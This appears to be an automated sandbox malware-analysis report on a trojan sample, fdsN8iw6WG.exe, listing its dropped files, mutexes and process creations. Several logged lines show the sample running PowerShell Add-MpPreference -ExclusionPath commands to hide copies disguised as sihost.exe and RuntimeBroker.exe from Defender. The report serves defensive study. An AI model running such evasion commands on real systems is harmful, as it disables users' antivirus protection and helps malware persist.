Source: powershell.exe, 0000001E.00000002.2715540404.0000020500228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2732238636.000002090C107000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2714667755.000002568022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2739841439.0000021885549000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2738740643.0000014189D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2751449420.00000284C8C7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: fdsN8iw6WG.exe, 00000000.00000002.2260614296.00000000037A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2715540404.0000020500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2732238636.000002090BEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2714667755.0000025680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2739841439.0000021885321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2738740643.0000014189A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2751449420.00000284C8A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001E.00000002.2715540404.0000020500228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2732238636.000002090C107000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2714667755.000002568022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2739841439.0000021885549000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2738740643.0000014189D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2751449420.00000284C8C7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000028.00000002.2751449420.00000284C8C7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000028.00000002.2714928586.00000284C6A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 0000001E.00000002.2715540404.0000020500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2732238636.000002090BEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2714667755.0000025680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2739841439.0000021885321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2738740643.0000014189A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2751449420.00000284C8A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000028.00000002.2751449420.00000284C8C7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC8295EB2BCC8D4700AEF6D1253A133871.TMP			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC8295EB2BCC8D4700AEF6D1253A133871.TMP

Jump to behavior

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 0_2_00007FF848E90D70	0_2_00007FF848E90D70
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 0_2_00007FF8492994DF	0_2_00007FF8492994DF
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 8_2_00007FF848E60D70	8_2_00007FF848E60D70
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 9_2_00007FF848E80D70	9_2_00007FF848E80D70
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848E90D70	16_2_00007FF848E90D70
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848EA07B6	16_2_00007FF848EA07B6
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848EA0000	16_2_00007FF848EA0000
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848EC0D31	16_2_00007FF848EC0D31
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848EC0D65	16_2_00007FF848EC0D65
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848EC96BE	16_2_00007FF848EC96BE
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848ECD3DC	16_2_00007FF848ECD3DC
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 16_2_00007FF848EA13EA	16_2_00007FF848EA13EA
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 33_2_00007FF848E50D70	33_2_00007FF848E50D70
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848E90D70	39_2_00007FF848E90D70
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848EA07B6	39_2_00007FF848EA07B6
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848EA0000	39_2_00007FF848EA0000
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848EC0D31	39_2_00007FF848EC0D31
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848EC0D65	39_2_00007FF848EC0D65
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848EC96BE	39_2_00007FF848EC96BE
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848ECD3DC	39_2_00007FF848ECD3DC
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 39_2_00007FF848EA13EA	39_2_00007FF848EA13EA
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 44_2_00007FF848EB0D31	44_2_00007FF848EB0D31
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 44_2_00007FF848EB0D65	44_2_00007FF848EB0D65
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 44_2_00007FF848EB96BE	44_2_00007FF848EB96BE
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 44_2_00007FF848EBD3DC	44_2_00007FF848EBD3DC
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 44_2_00007FF848E80D70	44_2_00007FF848E80D70
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 44_2_00007FF848E907B6	44_2_00007FF848E907B6
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 44_2_00007FF848E90000	44_2_00007FF848E90000
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Code function: 44_2_00007FF848E913EA	44_2_00007FF848E913EA
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 45_2_00007FF848E90D65	45_2_00007FF848E90D65
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 45_2_00007FF848E996BE	45_2_00007FF848E996BE
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 45_2_00007FF848E9D3DC	45_2_00007FF848E9D3DC
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 45_2_00007FF848E60D70	45_2_00007FF848E60D70
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 45_2_00007FF848E707B6	45_2_00007FF848E707B6
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 45_2_00007FF848E70000	45_2_00007FF848E70000
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 45_2_00007FF848E713EA	45_2_00007FF848E713EA
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 46_2_00007FF848EB0D31	46_2_00007FF848EB0D31
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 46_2_00007FF848EB0D65	46_2_00007FF848EB0D65
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 46_2_00007FF848EB96BE	46_2_00007FF848EB96BE
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 46_2_00007FF848EBD3DC	46_2_00007FF848EBD3DC
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 46_2_00007FF848E907B6	46_2_00007FF848E907B6
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 46_2_00007FF848E90000	46_2_00007FF848E90000
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 46_2_00007FF848E80D70	46_2_00007FF848E80D70
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 46_2_00007FF848E80872	46_2_00007FF848E80872
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Code function: 46_2_00007FF848E913EA	46_2_00007FF848E913EA
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 52_2_00007FF848E907B6	52_2_00007FF848E907B6
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 52_2_00007FF848E90000	52_2_00007FF848E90000
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 52_2_00007FF848EB0D31	52_2_00007FF848EB0D31
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 52_2_00007FF848EB0D65	52_2_00007FF848EB0D65
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 52_2_00007FF848EB96BE	52_2_00007FF848EB96BE
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 52_2_00007FF848EBD3DC	52_2_00007FF848EBD3DC
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 52_2_00007FF848E80D70	52_2_00007FF848E80D70
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 52_2_00007FF848E913EA	52_2_00007FF848E913EA
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 53_2_00007FF848E707B6	53_2_00007FF848E707B6
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 53_2_00007FF848E70000	53_2_00007FF848E70000
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 53_2_00007FF848E60D70	53_2_00007FF848E60D70
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 53_2_00007FF848E90D65	53_2_00007FF848E90D65
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 53_2_00007FF848E996BE	53_2_00007FF848E996BE
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 53_2_00007FF848E9D3DC	53_2_00007FF848E9D3DC
Source: C:\Program Files\Microsoft\sihost.exe	Code function: 53_2_00007FF848E713EA	53_2_00007FF848E713EA
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 54_2_00007FF848E90D70	54_2_00007FF848E90D70
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 54_2_00007FF848EC0D31	54_2_00007FF848EC0D31
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 54_2_00007FF848EC0D65	54_2_00007FF848EC0D65
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 54_2_00007FF848EC96BE	54_2_00007FF848EC96BE
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 54_2_00007FF848ECD3DC	54_2_00007FF848ECD3DC
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 54_2_00007FF848EA07B6	54_2_00007FF848EA07B6
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 54_2_00007FF848EA0000	54_2_00007FF848EA0000
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Code function: 54_2_00007FF848EA13EA	54_2_00007FF848EA13EA

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\FMuYuXzk.log 1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8

Source: fdsN8iw6WG.exe, 00000000.00000000.2119928328.0000000000B52000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fdsN8iw6WG.exe
Source: fdsN8iw6WG.exe, 00000000.00000002.2290010756.000000001C545000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs fdsN8iw6WG.exe
Source: fdsN8iw6WG.exe, 00000027.00000002.2420339625.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fdsN8iw6WG.exe
Source: fdsN8iw6WG.exe, 00000027.00000002.2420339625.0000000002C30000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fdsN8iw6WG.exe
Source: fdsN8iw6WG.exe, 0000002C.00000002.2420913729.000000000347B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fdsN8iw6WG.exe
Source: fdsN8iw6WG.exe, 0000002C.00000002.2420913729.00000000033C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fdsN8iw6WG.exe
Source: fdsN8iw6WG.exe, 0000002C.00000002.2420913729.0000000003400000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fdsN8iw6WG.exe
Source: fdsN8iw6WG.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs fdsN8iw6WG.exe

Source: fdsN8iw6WG.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: fdsN8iw6WG.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dEhCbXEAIUCUplvbdoWVtmGx.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RuntimeBroker.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sihost.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dEhCbXEAIUCUplvbdoWVtmGx.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: fdsN8iw6WG.exe, pdbekNQTGLIDcuiPehd.cs	Cryptographic APIs: 'CreateDecryptor'
Source: fdsN8iw6WG.exe, pdbekNQTGLIDcuiPehd.cs	Cryptographic APIs: 'CreateDecryptor'
Source: fdsN8iw6WG.exe, pdbekNQTGLIDcuiPehd.cs	Cryptographic APIs: 'CreateDecryptor'
Source: fdsN8iw6WG.exe, pdbekNQTGLIDcuiPehd.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@49/66@0/0

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe

File created: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe

Jump to behavior

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe

File created: C:\Users\user\Desktop\qcbjycVR.log

Jump to behavior

Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-YUXnB7xicRhpuDINWn5Y
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_03

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe

File created: C:\Users\user\AppData\Local\Temp\3a401533b82e2cb9c9bc589aa6ee01300983b035

Jump to behavior

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\V10Cviyryl.bat"

Source: fdsN8iw6WG.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: fdsN8iw6WG.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: fdsN8iw6WG.exe

ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe

File read: C:\Users\user\Desktop\fdsN8iw6WG.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\fdsN8iw6WG.exe "C:\Users\user\Desktop\fdsN8iw6WG.exe"
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\Microsoft\sihost.exe "C:\Program Files\Microsoft\sihost.exe"
Source: unknown	Process created: C:\Program Files\Microsoft\sihost.exe "C:\Program Files\Microsoft\sihost.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34F8.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC13EEC4598AE74082ADE16A1F2183AE80.TMP"
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38D0.tmp" "c:\Windows\System32\CSC8295EB2BCC8D4700AEF6D1253A133871.TMP"
Source: unknown	Process created: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\sihost.exe'
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe'
Source: unknown	Process created: C:\Users\user\Desktop\fdsN8iw6WG.exe C:\Users\user\Desktop\fdsN8iw6WG.exe
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fdsN8iw6WG.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\fdsN8iw6WG.exe C:\Users\user\Desktop\fdsN8iw6WG.exe
Source: unknown	Process created: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe "C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe"
Source: unknown	Process created: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe "C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe"
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\V10Cviyryl.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
Source: unknown	Process created: C:\Program Files\Microsoft\sihost.exe "C:\Program Files\Microsoft\sihost.exe"
Source: unknown	Process created: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe'	Jump to behavior
